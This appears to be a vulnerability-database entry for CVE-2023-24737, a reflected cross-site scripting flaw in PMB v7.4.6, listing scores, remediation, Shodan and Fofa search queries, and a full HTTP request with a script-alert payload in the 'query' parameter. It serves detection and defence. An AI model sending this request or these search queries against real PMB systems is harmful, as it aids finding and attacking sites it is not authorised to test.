🔙 목록으로 돌아가기

CVE-2023-24737: PMB v7.4.6 - Cross-Site Scripting

TitlePMB v7.4.6 - Cross-Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
RemediationApply the latest security patch or upgrade to a non-vulnerable version of PMB.
CVSS Score6.1
EPSS Score0.1156
CVE IDCVE-2023-24737
CWE IDCWE-79
Shodan Queryhttp.favicon.hash:1469328760http.html:"pmb group"
Fofa Querybody="pmb group"icon_hash=1469328760
Tags cve2023 cve xss pmb pmb_project sigb vuln

🔍 Vulnerability Description

PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the ‘query’ parameter.

🌐 HTTP Request

GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-24737.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-24737.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A